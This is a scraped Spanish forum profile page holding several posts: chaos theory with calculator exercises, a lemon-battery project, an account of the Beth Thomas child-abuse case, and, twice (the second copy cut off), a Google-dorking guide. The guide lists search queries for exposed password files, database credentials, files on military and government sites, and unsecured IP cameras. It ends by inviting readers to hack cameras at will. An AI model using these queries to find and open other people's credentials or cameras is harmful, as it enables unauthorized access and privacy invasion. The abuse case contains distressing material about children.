el progreso de la física siguió con dos rupturas: 1) La teoría de la relatividad, en la cual es espacio y el tiempo dejaban de ser absolutos y la masa de un móvil dependía de su velocidad. 2) La mecánica cuántica, en la que al binomio objeto medido - instrumento de medida se unía un tercero en discordia, el operador, y la precisión en la medida quedaba limitada intrínsecamente por el principio de incertidumbre de Heisenberg. A principio de los años cincuenta, el matemático americano, trasplantado a meteorólogo, E. Lorentz (nada que ver con el etólogo ni con el físico de similar apellido), casi por casualidad, descubrió que, al resolver numéricamente utilizando los ordenadores de que se disponía entonces, pequeñísimas diferencias en las condiciones iniciales de un problema conducían a soluciones muy diferentes. Como ocurre tantas veces en ciencia, las ideas de Poincaré se rescataban. Quizás el pensador francés se había anticipado a su tiempo. Lorentz acuñó el término efecto mariposa (“el aleteo de una mariposa en California, puede provocar una tormenta tropical en Australia”) para indicar aquellas situaciones en las que una pequeña causa puede multiplicarse de tal modo que acabe produciendo un resultado catastrófico. Estas situaciones se caracterizan por: 1) Estar descritas matemáticamente por sistemas de ecuaciones diferenciales no lineales 2) Presentar gran sensibilidad a las condiciones iniciales, con sinergias y retroalimentaciones, en los que aparecen en consecuencia "Efectos Mariposa" 3) Ser disipativas, es decir que para evolucionar necesitan un aporte constante de energía 4) En su devenir se va perdiendo información de modo que al cabo de un tiempo, más o menos largo, pierden toda relación con las condiciones iniciales 5) Se dice que presentan un comportamiento de caos determinista. 6) La expresión caos determinista puede parecer una contradicción en los términos, enfrentados caos y desorden frente a determinismo y orden. Con ella precisamente quiere darse a entender que la perdida de la información que caracteriza al caos no es debida a circunstancias más o menos aleatorias, como las que se contemplan en la última revolución de la Física, la mecánica cuántica, sino a las precisas leyes deterministas de la física clásica. Resumiendo, el comportamiento caótico de un sistema físico nos lo podemos encontrar prácticamente en todas partes y es una representación real de la naturaleza. La representación y modelización de estos sistemas complejos puede ser complicada, sin embargo, su tratamiento no es imposible y abre una muy interesantes perspectivas a la investigación científica en todos los campos. Ejemplos de sistemas en los que puede aparecer un comportamiento caótico: a) Mecánica celeste (3 cuerpos) b) Fluidos c) Láseres y sistemas ópticos no lineales d) Sólidos e) Plasmas f) Aceleradores de partículas g) Reacciones químicas (Belusov-Zabotinsky) h) Dinámica de poblaciones (cazador-presa) i) Sistemas biológicos diversos j) Economía y sociología Pero bien, qué es el efecto mariposa? Hacia 1960, el meteorólogo Edward Lorenz se dedicaba a estudiar el comportamiento de la atmósfera, tratando de encontrar un modelo matemático, un conjunto de ecuaciones, que permitiera predecir a partir de variables sencillas, mediante simulaciones de ordenador, el comportamiento de grandes masas de aire, en definitiva, que permitiera hacer predicciones climatológicas. Edward Lorenz Lorenz realizó distintas aproximaciones hasta que consiguió ajustar el modelo a la influencia de tres variables que expresan como cambian a lo largo del tiempo la velocidad y la temperatura del aire. El modelo se concretó en tres ecuaciones matemáticas, bastante simples, conocidas, hoy en día, como modelo de Lorenz. Pero, Lorenz recibió una gran sorpresa cuando observó que pequeñas diferencias en los datos de partida (algo aparentemente tan simple como utilizar 3 ó 6 decimales) llevaban a grandes diferencias en las predicciones del modelo. De tal forma que cualquier pequeña perturbación, o error, en las condiciones iniciales del sistema puede tener una gran influencia sobre el resultado final. De tal forma que se hacía muy difícil hacer predicciones climatológicas a largo plazo. Los datos empíricos que proporcionan las estaciones meteorológicas tienen errores inevitables, aunque sólo sea porque hay un número limitado de observatorios incapaces de cubrir todos los puntos de nuestro planeta. esto hace que las predicciones se vayan desviando con respecto al comportamiento real del sistema. Lorenz intentó explicar esta idea mediante un ejemplo hipotético. Sugirió que imaginásemos a un meteorólogo que hubiera conseguido hacer una predicción muy exacta del comportamiento de la atmósfera, mediante cálculos muy precisos y a partir de datos muy exactos. Podría encontrarse una predicción totalmente errónea por no haber tenido en cuenta el aleteo de una mariposa en el otro lado del planeta. Ese simple aleteo podría introducir perturbaciones en el sistema que llevaran a la predicción de una tormenta. De aquí surgió el nombre de efecto mariposa que, desde entonces, ha dado lugar a muchas variantes y recreaciones. Se lo llama Efecto Mariposa o Reacción en Cadena a la amplificación de errores que pueden aparecer en el comportamiento de un sistema complejo. En definitiva, el efecto mariposa es una de las características del comportamiento de un sistema caótico, en el que las variables cambian de forma compleja y errática, haciendo imposible hacer predicciones más allá de un determinado punto, que recibe el nombre de horizonte de predicciones. Ahora bien algunos ejemplos practicos para que sea mas facil entenderlos: Se pueden simular muy fácilmente situaciones de caos mediante una hoja de cálculo o, simplemente, con una calculadora. Aquí te mostarmos cómo puedes hacerlo fácilmente. Pero primero vamos a ver qué entendemos por iterar una función matemática. En matemáticas se llama iterar una función a utilizar el resultado de un paso como variable del paso siguiente, formalmente escrito yn= f(x) ; yn+1 = f(yn). Probá lo siguiente: Ejemplo 1 Desde un punto de vista práctico puede iterarse la función coseno en la calculadora del modo siguiente: 1) Poné la calculadora en modo radian 2) Elegí un valor cualquiera, por ejemplo 0,5 (o cualquier otro excepto el cero) 3) Apretá sucesivas veces la tecla cos Aparece una serie que, al llegar a unas 50 iteraciones (pulsaciones de la tecla), se obstina en el número 0,739085133. La serie coseno converge en la iteración. Ejemplo 2 Ahora proba la operación con la tecla 1/x, la secuencia desemboca en dos números también similares, 0,54321 y 1,840908673. En este caso la recurrencia es periódica de periodo 2. Ejemplo 3 Probá experimentar con distintas teclas. En algunos casos la función crece rápidamente hasta un mensaje de error (es el caso de ex o 10x); en otros no sigue ninguna pauta, pero parece como si se atascara en torno a cierto valor (por ejemplo, en el caso de tan); en otras sin embargo aparece o bien convergencia o bien periodicidad. Ejemplo 4 Si probás una ecuación por ejemplo la ecuación y = 2x2 –1 e iniciás la iteración por el número 0,54321 y se repite por empezando por el número 0,54322 fijate como rápidamente las trayectorias de ambas series, que se parecen, dan unas graficas completamente impredecibles. Fijate el siguiente gráfico: Iteración de la ecuación y = 2x2 –1. (Serie 1: 0,54321; Serie 2: 0,54322) Acá es donde aparece el caos. Ejemplo 5 Fijate cambiando el “2” de la ecuación y = kx2 –1 por otros valores, por ejemplo k = 1,4 con este valor y empezando en x = 0,5 al cabo de unos cuantos valores un tanto erráticos aparece un ciclo de orden 16, para 1,74 el caos es total, sin embargo para 1,75 reaparece el orden, la serie se estabiliza en tres valores (dos muy próximos). K = 1,4 K = 1,74 K = 1,75 Estas son algunas de las características de los sistemas caóticos, de repente se reorganizan y dentro de un mundo caótico aparecen ventanas de orden. Espero que les haya sido útil. Visiten mis otros post: "...los '90 mi infancia...que epoca "Teté" ": http://www.taringa.net/posts/taringa/6150699/___los-_90-mi-infancia___que-epoca-Equot_TeteEquot_.html "Programacion en C Kernighan y Ritchie" http://www.taringa.net/posts/downloads/6139149/Programacion-en-C-Kernighan-y-Ritchie.html "Como crear una bateria con un Limon!" http://www.taringa.net/posts/ciencia-educacion/14135636/Como-crear-una-bateria-con-un-Limon.html

29
2
Como crear una bateria con un Limon
Como crear una bateria con un Limon
Ciencia EducacionporAnónimo2/27/2012

Quizas suene loco o raro pero se puede,basicamente consiste en insertar, en un limón, dos objetos hechos de metales diferentes, por ejemplo un clavo galvanizado y una moneda de cobre. Estos dos objetos funcionan como electrodos, causando una reacción electroquímica mediada por el jugo de limón que genere una pequeña cantidad de corriente eléctrica. Después de que la pila está ensamblada, se puede usar un voltimetro para comprobar el voltaje generado, que usualmente no supera 1 V. El voltaje y corriente producido es insuficiente para encender un LED estándar, para lo que se requeriría una batería hecha de varias pilas de limón. Se necesitan al menos dos pilas conectadas en serie para duplicar el voltaje y varias conectadas en paralelo para alcanzar corrientes del orden de 5 mA. Materiales: 1) Limon. 2) Cuchillo. 3) Metal 1: En este caso un clavo 4) Metal 2: En este caso una moneda. Procedimiento: 1) Cortas el limon haciendole 2 espacios lo suficientemente cortos como para que entren los metales (en el caso del clavo, esta claro que no necesitas hacerle un corte). Hacelos con cierta distancia uno del otro. 2) Introducis los metales (lml). 3) Proba con un voltimetro de que lado es el positivo y de que lado el negativo, generalmente si pones la moneda es la moneda porque es de cobre, pero depende del tipo de metales que uses. 4) Podes probar con un Led o con algo que requiera poca bateria. 5) (Opcional) Podes jugarte con un par mas y aumentar el voltaje, para unirlos necesitas unos ganchos de metal y algun alambre para que pueda transmitirse la corriente. Bien ¿Que pasa? Técnicamente ocurren la oxidación y la reducción. En el ánodo, el cinc (zinc) es oxidado: Zn ---> Zn2+ - 2 e- En el cátodo, se reduce el cobre: Cu+++ 2e- ---> Cu Un alternativa común a los limones son las papas o a veces manzanas. Cualquier fruta o vegetal que contenga ácido u otro electrolito puede ser usado, pero los limones se prefieren debido a su mayor acidez. Otras combinaciones de metales (como magnesio y cobre) son más eficientes, pero usualmente son usados el zinc y el cobre porque son razonablemente seguros y fáciles de obtener. Usar una tira de magnesio en vez del zinc debe duplicar, aproximadamente, la corriente producida en la celda de limón (aproximadamente 240 µA con zinc y cerca de 400 µA con magnesio) y también aumenta levemente el voltaje (0.97 V con zinc y 1.6 V con magnesio). Los voltajes y corrientes alcanzados dependen criticamente de la acidez de los limones y del tamaño y metal de los objetos usados. Aca les dejo un video, esta en ingles pero esta detallado paso por paso.

24
24
V
Vulnerar información con Google
InfoporAnónimo3/9/2012

Antes que nada quiero decirles que éste artículo esta basado en un Texto de http://www.xonico.com.ar dijo:Google.com es el motor de búsqueda más popular del mundo y para muchos el mejor, posee una gran variedad de comandos que hacen de nuestra busque más fácil y eficaz, más que un buscador es un amigo, con él podremos encontrar todo el material necesario para aprender sobre cualquier tema que nos sea de interés. En este artículo debido a la amplitud del tema sólo me basaré en la utilización de google como una herramienta para localizar contraseñas, base de datos, archivos privados, vulnerabilidades, y algunas cosas de interés general. El objetivo de este artículo es familiarizarse con los procedimientos de búsqueda y adoptar una estrategia de búsqueda para obtener vulnerabilidades que pueden ser útiles si manejas tu propia base de datos. Antes de empezar, google no diferencia minúsculas de mayúsculas y acentos, para él buscador es lo mismo que pongas exploit que Exploit o que pongas programación o programacion, a continuación voy a explicar los diferentes operadores de google. - Podés buscar una frase exacta usando las comillas “palabra1 palabra2...“ ejemplo: “programacion en c” - Si lo que querés es encontrar una palabra u otra podrías utilizar el operador OR, o con el simbolo |, puedes hacer mas efectiva tu búsqueda agregando paréntesis para agrupar palabras... ejemplo: programacion (manual OR tutorial) programacion (manual | tutorial) - Otro es el operador + que nos incluye palabras que google no las toma por defecto como (de, la, las, los, etc.), también se escribe para indicar que esa palabra es necesaria en la búsqueda... ejemplo: +la programacion programacion delphi +fuentes - Puedes excluir palabras en la búsqueda con el símbolo – (menos) ejemplo: programacion -pascal - Existe también el asterisco * para reemplazar por palabras ejemplo: “programacion en *” Ahora que ya sabemos los operadores básicos comenzaremos con algo mas divertido. Si tu sitio contiene información confidencial o no esta bien configurado, con solo entrar a google estarías vulnerable a cualquier persona. Pareciera que no es cierto pero es así... Entonces probá lo siguiente. Frontpage permite añadir formularios para capturar el feedback de los visitantes, en los cuales podrían añadirse campos como: nombre, dirección, número de teléfono y otros datos importantes. De forma predeterminada, esto se almacena en _privateform_results.txt La carpeta _private debería tener permisos que limiten su acceso, pero a veces la gente se olvida de ellos. Para comprobar hasta qué punto puedes llegar utilizando google prueba con: allinurl:"form_results.txt" Allinurl: busca páginas que tengan el término en alguna parte del URL (la dirección web). Inurl: es lo mismo pero se puede combinar algunos operadores. allinurl:passwd.txt Esto nos mostraría las paginas que contengan en su url passwd.txt, usando un poco la imaginación este comando nos sería de gran utilidad. Por ejemplo si conocemos una falla de php-nuke de sql injection en las contraseñas del admin, y si sabemos que la falla se encuentra en los archivos admin.php podremos buscar allinurl:admin.php Podemos restringir mas la búsqueda con el comando Site: allinurl:admin.php site:.edu Restringe buscando solo en los sitios .edu Filetype: busca archivos .pdf, .ps, .doc, .xls, .txt, .ppt, .rtf, .asp, .wpd... filetype:xls password site:.mil Buscaría archivos con extensión exel en los sitios militares, que contengan la palabra password Otra manera para encontrar archivo es usando las comillas “archivo.ext” ejemplo: “config.inc.php” OR “mysql.cfg” Index of: Uno de los tipos de búsqueda que nos permite hacer google es mostrar directorios poniendo en un índice, debido a la mala configuración del webmaster podemos encontrar cosas muy interesantes. Ejemplos: "Index of /admin" "Index of /root" "Index of /password" "Index of /" +passwd" Allintitle e Intitle: restringe la búsqueda únicamente al título de la página web (aquello que está entre las etiquetas). allintitle: "index of/admin" allintitle: restricted filetype:doc site:gov intitle:"index of private" Cache: con este comando podemos ver paginas o textos ya borrados, esto si googlebot (el robot de google) pasó por la web y la indexó antes de ser borrada la pagina. cache:http://www.elhost.com/pass.txt Los comandos link, related, info... tal vez no sean de utilidad como herramientas de hack pero sería bueno saber para que sirven. link: para buscar webs que pongan un enlace a cierta web related: páginas relacionadas o parecidas con la página de inicio de aquella web que usemos como referencia. info: muestra la información que google tiene de nuestra página de inicio o principal. Algunos ejemplos de búsqueda que podemos realizar con lo aprendido. Algunas que otras contraseñas: allinurl:auth_user_file.txt intitle:"Index of" config.php intitle:index.of.etc filetype:xls username password email intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c intitle:"Index of" ".htpasswd" htpasswd.bak inurl:config.php dbuname dbpass intitle:"Index of" master.passwd intitle:"Index of" .mysql_history intitle:"index of" trillian.ini intitle:"Index of" spwd.db passwd -pam.conf intitle:"Index of" pwd.db intitle:"Index of" secring.bak intitle:"Index of" "people.lst" intitle:"Index of..etc" passwd intitle:"Index of" passwd passwd.bak intitle:index.of passlist Buscando usuarios: intitle:"Index of" .bash_history intitle:"Index of" .sh_history Ninguna contraseña ni usuarios pero unas que otras cosas interesantes: site:edu grades admin filetype:htaccess basic intitle:"Index of" finances.xls "This report was generated by WebLog" "phpinfo.php" –manual intitle:Index.of robots.txt Mensajes de error que dicen mucho: "Chatologica MetaSearch" "stack tracking:" "Error Diagnostic Information" intitle:"Error Occurred While" "supplied argument is not a valid MySQL result resource" Existen muchisimos archivos vulnerables que google puede encontrar: intitle:"Index of" _vti_inf.html intitle:"Index of" service.pwd intitle:"Index of" shtml.dll intitle:"Index of" shtml.exe intitle:"Index of" fpcount.exe intitle:"Index of" default.asp intitle:"Index of" htimage.exe intitle:"Index of" default.asp intitle:"Index of" AT-admin.cgi intitle:"Index of" glimpse intitle:"Index of" guestbook.cgi intitle:"Index of" perl intitle:"Index of" show intitle:"Index of" index.html~ intitle:"Index of" stats.html inurl:shop "Hassan Consulting's Shopping Cart Version 1.18" Encontrando algunes servidores con determinados servicios y sistemas operativos intitle:"Welcome to Windows 2000 Internet Services" intitle:"Welcome to IIS 4.0" "powered by openbsd" +"powered by apache" "Powered by phpBB 2.0.0" Otros google's, algunos útiles otros no, que si utilizan un poco la imaginación les podrían ser útiles. http://images.google.com/ Buscador de imágenes. http://groups.google.com/ Buscador dentro de los grupos de 'news' (newsgroups). Contiene el archivo de DejaNews, adquirida por Google. http://directory.google.com/ Utiliza la tenología de Google para buscar dentro de las categorías del OpenDirectory - DMOZ- (www.dmoz.org) http://news.google.com/ Buscador de noticias, en más de 4.000 medios de comunicación de Internet. http://froogle.google.com/froogle Es un buscador de información de productos online. Google no es el que vende, simplemente se aprovecha de su motor de búsqueda para reconocer los sitios web que ofrecen productos online y crear una base de datos con sus datos y sus URLs. http://catalogs.google.com/ Buscador de productos, dentro de los catálogos de venta por correo de cientos de empresas. http://labs.google.com/ Servidor de pruebas de Google, donde se pueden hacer búsquedas de significado de palabras, conjuntos de términos, búsqueda por voz, y búsqueda avanzada por el teclado. http://answers.google.com/ Cientos de usuarios realizan sus preguntas, y ofrecen recompensa por las respuestas. http://toolbar.google.com/ Integración de una barra de búsqueda de Google dentro del navegador web. Solamente disponible para MS IExplorer sobre MS Windows. Otros navegadores web incluyen una herramienta similar. Por ejemplo, para Mozilla se ha desarrollado http://googlebar.mozdev.org/ http://www.google.com/unclesam Busca en los servidores cuyos dominios son .gov, .mil ó .us http://www.google.com/linux Busca términos relacionados con el Sistema Operativo Linux. http://www.google.com/bsd Busca términos relacionados con los Sistema Operativo BSD*. http://www.google.com/mac Busca dentro de todo lo relacionado con Apple y Macintosh. http://www.google.com/microsoft Busca términos relacionados con la compañía Microsoft. http://www.google.com/options/universities.html Las Universidades de todo el mundo pueden añadir su propio Google. http://www.google.com/wml Versión WAP de Google. http://translate.google.com/translate_t Traduce páginas webs entre varios idiomas (inglés, español, alemán, francés, ...). http://www.googlestore.com/ Camisetas, bolígrafos, gorras, ... Todo relacionado con Google. Referencias: http://google.dirson.com http://www.vnunet.com/News/1127162 http://johnny.ihackstuff.com/ http://www.oreilly.com/catalog/googlehks/ Uno de los ejemplos de las cosas mas 'grosas' que podemos llegar a conseguir http://domecam.uridium.ch/CgiStart?page=Multi&Language=9&Page=2&Resolution=320x240&Interval=0&Quality=Standard&Mode=Motion Algunos ejemplo de los codigos que debemos utilizara para ver camaras ip [hagan click en las opciones] (de servidores poco seguros) (las opciones tiran resultados distintos) : Opcion 1 código: inurl:/view.shtml Opcion 2 código: inurl:ViewerFrame?Mode= Opcion 3 código: inurl:ViewerFrame?Mode=Refresh Opcion 4 código: inurl:axis-cgi/jpg Opcion 5 código: inurl:axis-cgi/mjpg (motion-JPEG) Opcion 6 código: inurl:view/indexFrame.shtml (motion-JPEG) Opcion 7 código: inurl:view/index.shtml Opcion 8 código: inurl:view/view.shtml Opcion 9 código: intitle:axis intitle:”video server” Opcion 10 código: iintitle:liveapplet inurl:LvAppl Opcion 11 código: intitle:”EvoCam” inurl:”webcam.html” Opcion 12 código: intitle:”Live NetSnap Cam-Server feed” Opcion 13 código: intitle:”Live View / - AXIS” Opcion 14 código: intitle:”Live View / - AXIS 206M” Opcion 15 código: intitle:”Live View / - AXIS 206W” Opcion 16 código: intitle:”Live View / - AXIS 210″ Opcion 17 código: inurl:indexFrame.shtml Axis Opcion 18 código: inurl:”MultiCameraFrame?Mode=Motion” intitle: busca paginas con el titulo... ": que sea exactamente esto live view: este servidor pones esto a todas sus pag. por eso nos sirve para buscar ahi iurl: que en la direccion este... index.shtml: es la extencion que usa ese servidor Si leyeron bien y prestaron atención están capacitados para hacer sus experimentos y hackear cámaras ip a su gusto Bueno, esto fue todo por ahora, los invito a pasarse por mis otros post. ...Los '90...qué época loco... http://www.taringa.net/posts/imagenes/14199295/___los-_90-mi-infancia___que-epoca-loco___.html#comid-847479 Como hacer tu propia fuente electricia ininterrumpida (UPS) http://www.taringa.net/posts/hazlo-tu-mismo/14145132/Como-hacer-tu-propia-fuente-electricia-ininterrumpida-_UPS_.html

5
3
Conocé la historia de Beth la niña psicópata (real)
Conocé la historia de Beth la niña psicópata (real)
Ciencia EducacionporAnónimo3/8/2016

Muchos ya conocerán el caso de Beth Thomas, una intrigante historia que está impactando fuertemente en las redes sociales y que no ha dejado indiferente a nadie. Tanto para los que no hayan oído hablar aún de esta niña como para los que sí, recomendamos seguir leyendo este artículo. Beth Thomas: la historia de la niña psicópata Esta historia trata de una niña que perdió a su madre cuando solo contaba un año de edad. Ella y su hermano quedaron bajo la tutela de su padre biológico, el cual abusó sexualmente de los dos menores. Por suerte, los abusos fueron detectados por médicos y los niños fueron acogidos por una asistente social seis meses después. Por suerte para Beth y para su hermano pequeño Jonathan, ambos fueron adoptados por una pareja cristiana llena de ilusión por ser padres pero que no podían concebir. Todo parecía ir bien hasta que Beth empezó a manifestar que tenía pesadillas muy extrañas, y estos se dieron cuenta de que algo no marchaba bien. Pesadillas, un preludio de la conducta antisocial de la pequeña Beth Las pesadillas de la pequeña trataban sobre un hombre que se “caía encima suyo y la hería con una parte de él”. En adición, Beth manifestaba conductas violentas hacia su hermano, sus padres y animales (a los cuales llegó a matar). Además de ira, también encontraron que Beth manifestaba conductas sexuales inadecuadas: la niña se masturbaba públicamente y de manera excesiva, llegando a producirse sangrado. Estos hechos hicieron considerar a los padres la posibilidad de acudir a un psicólogo. Precisamente en el transcurso del diagnóstico y la terapia psicológica a Beth se graba el vídeo que ha recorrido el mundo: una entrevista a Beth realizada por el Dr. Ken Magid, un psicólogo clínico especialista en el tratamiento de niños víctimas de severos abusos sexuales. Lo que descubrió este psicólogo sobre las causas y los efectos del abuso sexual es objeto de estudio en todas las facultades de psicología. link: https://www.youtube.com/watch?v=-WOkND4CScw Los escalofriantes diálogos entre Beth y su psicólogo Esta es una pequeña transcripción del inicio de la entrevista: -“Dr. Ken: ¿Las personas te temen Beth? -Beth: Sí. -Dr. Ken: ¿Tus padres tienen miedo de ti? -Beth: Sí. -Dr. Ken: ¿Qué harías con ellos? -Beth: Apuñalarlos. -Dr. Ken: ¿Qué harías con tu hermano? -Beth: Matarlo. -Dr. Ken: ¿En quién te gustaría meter alfileres? -Beth: En mamá y papá. -Dr. Ken: ¿Qué te gustaría que sucediera con ellos? -Beth: Que murieran.” La pequeña admitió haber maltratado físicamente a su hermano Beth admitió, en sus conversaciones con el Dr Ken y con total frialdad, haber maltratado a su hermano desde siempre, dándole cabezazos contra el suelo, clavándole alfileres en todo el cuerpo y en sus partes intimas, estirando y pateando sus genitales... Incluso llegó a explicar que una vez lo intentó matar, y solamente paró debido a que sus padres la descubrieron. Admitió que también había pensado seriamente en matar a sus padres en varias ocasiones y que maltrataba a sus mascotas habitualmente. No contenta solo con eso, llegó a matar a varios animales que merodeaban por el patio de su casa. Ante todos estos hechos que ella misma iba relatando, Beth reconoció no sentir ningún tipo de remordimiento ni culpa, su tono de voz ante todas sus declaraciones era frío y calmado, como si estuviese explicando cualquier anécdota trivial. Preguntada sobre el motivo por el cual actuaba de esta forma, respondía que quería hacer sentir todo lo que ella sintió en el pasado durante los abusos de su padre. Asimismo, ante todas las preguntas del doctor referidas a si ella era conciente de que estos actos producirían sufrimiento en la otra persona, admitió con serenidad que sí, que era eso, precisamente, lo que ella desea. Internamiento en un centro especial y tratamiento psicológico Después de una larga entrevista, el psicólogo obtuvo la información suficiente como para llevarle a decidir internar a la niña en un centro de tratamiento de niños con distintos trastornos de comportamiento. Beth fue diagnosticada con un grave trastorno del apego, el cual se caracteriza por el desarrollo de la incapacidad de establecer relaciones sanas y adecuadas, debido en este caso a la historia de abuso sexual y maltrato por parte de su padre. El trastorno del apego precisa recibir atención psicológica urgente, pues sino podría convertirse en un peligro para la propia Beth y para sus familiares, debido a la completa falta de empatía que manifestaba, que podría ser equiparable a trastornos como la sociopatía o la psicopatía. El motivo por el cual Beth no fue diagnosticada como psicópata en ese momento es porque en esa época aún no se conocía la existencia del trastorno disocial de la personalidad (trastorno antisocial de la personalidad antes de los 18 años), sobre el cual todavía perdura un extenso debate entre los académicos de la salud mental. Tratamiento psicológico para controlar sus impulsos antisociales El tratamiento que le impusieron a Beth fue muy estricto y ordenado. Especialmente diseñado para niños con su mismo trastorno, a los cuales les es muy complicado respetar reglas y hábitos. Durante la noche, y para impedir que lastimase a otros niños, Beth era encerrada en una habitación. Asimismo, debía pedir permiso para todo, desde ir al baño hasta incluso para beber agua. Con el paso del tiempo, las restricciones fueron siendo menos estrictas y Beth fue mejorando progresivamente. Beth pudo recuperarse totalmente y hoy en día es una persona con una vida común Al final del video podemos observar el gran avance del tratamiento a Beth. Al cabo de los años, podemos ver a Beth como una persona con capacidad para empatizar y para ser conciente de las consecuencias de sus actos. Obviamente, su aparente 'maldad' tenía su génesis en el maltrato continuado del que fue víctima siendo un bebé, y su caso sirve para ilustrar las calamitosas consecuencias del maltrato físico y psicológico a corta edad. Actualmente, Beth lleva una vida normal y trabaja como enfermera. Sus méritos profesionales le han hecho merecedora de varios galardones. Este caso nos hace llegar a las conclusiones siguientes: la importancia de una buena crianza, especialmente en los periodos críticos del niño. Pero también nos habla sobre la efectividad (al menos en este caso) de la terapia psicológica, incluso en casos de extrema gravedad y que pueden parecer irreconducibles. ¿Cuáles fueron las claves psicoterapéuticas de su recuperación? Esta total recuperación psicológica de la pequeña Beth pudo lograrse haciendo tomar conciencia a la niña sobre sus actos, aumentando su autoestima, además de cimentar los hábitos y conductas sociales funcionales, por ejemplo consiguiendo que fuera capaz de aceptar ciertas normas y poder gestionar, canalizar y entender el motivo de su ira. Recomiendo ver el documental del caso de Beth entero, llevado a cabo por la cadena HBO en 1992. Es realmente interesante y conviene conocer a fondo este caso, por todo lo que nos puede enseñar como profesionales y como seres humanos.

250
110
V
Vulnerar información con Google (Actualizado)
InfoporAnónimo5/16/2012

Antes que nada quiero decirles que éste artículo esta basado en un Texto de http://www.xonico.com.ar dijo:Google.com es el motor de búsqueda más popular del mundo y para muchos el mejor, posee una gran variedad de comandos que hacen de nuestra busque más fácil y eficaz, más que un buscador es un amigo, con él podremos encontrar todo el material necesario para aprender sobre cualquier tema que nos sea de interés. En este artículo debido a la amplitud del tema sólo me basaré en la utilización de google como una herramienta para localizar contraseñas, base de datos, archivos privados, vulnerabilidades, y algunas cosas de interés general. El objetivo de este artículo es familiarizarse con los procedimientos de búsqueda y adoptar una estrategia de búsqueda para obtener vulnerabilidades que pueden ser útiles si manejas tu propia base de datos. Antes de empezar, google no diferencia minúsculas de mayúsculas y acentos, para él buscador es lo mismo que pongas exploit que Exploit o que pongas programación o programacion, a continuación voy a explicar los diferentes operadores de google. - Podés buscar una frase exacta usando las comillas “palabra1 palabra2...“ ejemplo: “programacion en c” - Si lo que querés es encontrar una palabra u otra podrías utilizar el operador OR, o con el simbolo |, puedes hacer mas efectiva tu búsqueda agregando paréntesis para agrupar palabras... ejemplo: programacion (manual OR tutorial) programacion (manual | tutorial) - Otro es el operador + que nos incluye palabras que google no las toma por defecto como (de, la, las, los, etc.), también se escribe para indicar que esa palabra es necesaria en la búsqueda... ejemplo: +la programacion programacion delphi +fuentes - Puedes excluir palabras en la búsqueda con el símbolo – (menos) ejemplo: programacion -pascal - Existe también el asterisco * para reemplazar por palabras ejemplo: “programacion en *” Ahora que ya sabemos los operadores básicos comenzaremos con algo mas divertido. Si tu sitio contiene información confidencial o no esta bien configurado, con solo entrar a google estarías vulnerable a cualquier persona. Pareciera que no es cierto pero es así... Entonces probá lo siguiente. Frontpage permite añadir formularios para capturar el feedback de los visitantes, en los cuales podrían añadirse campos como: nombre, dirección, número de teléfono y otros datos importantes. De forma predeterminada, esto se almacena en _privateform_results.txt La carpeta _private debería tener permisos que limiten su acceso, pero a veces la gente se olvida de ellos. Para comprobar hasta qué punto puedes llegar utilizando google prueba con: allinurl:"form_results.txt" Allinurl: busca páginas que tengan el término en alguna parte del URL (la dirección web). Inurl: es lo mismo pero se puede combinar algunos operadores. allinurl:passwd.txt Esto nos mostraría las paginas que contengan en su url passwd.txt, usando un poco la imaginación este comando nos sería de gran utilidad. Por ejemplo si conocemos una falla de php-nuke de sql injection en las contraseñas del admin, y si sabemos que la falla se encuentra en los archivos admin.php podremos buscar allinurl:admin.php Podemos restringir mas la búsqueda con el comando Site: allinurl:admin.php site:.edu Restringe buscando solo en los sitios .edu Filetype: busca archivos .pdf, .ps, .doc, .xls, .txt, .ppt, .rtf, .asp, .wpd... filetype:xls password site:.mil Buscaría archivos con extensión exel en los sitios militares, que contengan la palabra password Otra manera para encontrar archivo es usando las comillas “archivo.ext” ejemplo: “config.inc.php” OR “mysql.cfg” Index of: Uno de los tipos de búsqueda que nos permite hacer google es mostrar directorios poniendo en un índice, debido a la mala configuración del webmaster podemos encontrar cosas muy interesantes. Ejemplos: "Index of /admin" "Index of /root" "Index of /password" "Index of /" +passwd" Allintitle e Intitle: restringe la búsqueda únicamente al título de la página web (aquello que está entre las etiquetas). allintitle: "index of/admin" allintitle: restricted filetype:doc site:gov intitle:"index of private" Cache: con este comando podemos ver paginas o textos ya borrados, esto si googlebot (el robot de google) pasó por la web y la indexó antes de ser borrada la pagina. cache:http://www.elhost.com/pass.txt Los comandos link, related, info... tal vez no sean de utilidad como herramientas de hack pero sería bueno saber para que sirven. link: para buscar webs que pongan un enlace a cierta web related: páginas relacionadas o parecidas con la página de inicio de aquella web que usemos como referencia. info: muestra la información que google tiene de nuestra página de inicio o principal. Algunos ejemplos de búsqueda que podemos realizar con lo aprendido. Algunas que otras contraseñas: allinurl:auth_user_file.txt intitle:"Index of" config.php intitle:index.of.etc filetype:xls username password email intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c intitle:"Index of" ".htpasswd" htpasswd.bak inurl:config.php dbuname dbpass intitle:"Index of" master.passwd intitle:"Index of" .mysql_history intitle:"index of" trillian.ini intitle:"Index of" spwd.db passwd -pam.conf intitle:"Index of" pwd.db intitle:"Index of" secring.bak intitle:"Index of" "people.lst" intitle:"Index of..etc" passwd intitle:"Index of" passwd passwd.bak intitle:index.of passlist Buscando usuarios: intitle:"Index of" .bash_history intitle:"Index of" .sh_history Ninguna contraseña ni usuarios pero unas que otras cosas interesantes: site:edu grades admin filetype:htaccess basic intitle:"Index of" finances.xls "This report was generated by WebLog" "phpinfo.php" –manual intitle:Index.of robots.txt Mensajes de error que dicen mucho: "Chatologica MetaSearch" "stack tracking:" "Error Diagnostic Information" intitle:"Error Occurred While" "supplied argument is not a valid MySQL result resource" Existen muchisimos archivos vulnerables que google puede encontrar: intitle:"Index of" _vti_inf.html intitle:"Index of" service.pwd intitle:"Index of" shtml.dll intitle:"Index of" shtml.exe intitle:"Index of" fpcount.exe intitle:"Index of" default.asp intitle:"Index of" htimage.exe intitle:"Index of" default.asp intitle:"Index of" AT-admin.cgi intitle:"Index of" glimpse intitle:"Index of" guestbook.cgi intitle:"Index of" perl intitle:"Index of" show intitle:"Index of" index.html~ intitle:"Index of" stats.html inurl:shop "Hassan Consulting's Shopping Cart Version 1.18" Encontrando algunes servidores con determinados servicios y sistemas operativos intitle:"Welcome to Windows 2000 Internet Services" intitle:"Welcome to IIS 4.0" "powered by openbsd" +"powered by apache" "Powered by phpBB 2.0.0" Otros google's, algunos útiles otros no, que si utilizan un poco la imaginación les podrían ser útiles. http://images.google.com/ Buscador de imágenes. http://groups.google.com/ Buscador dentro de los grupos de 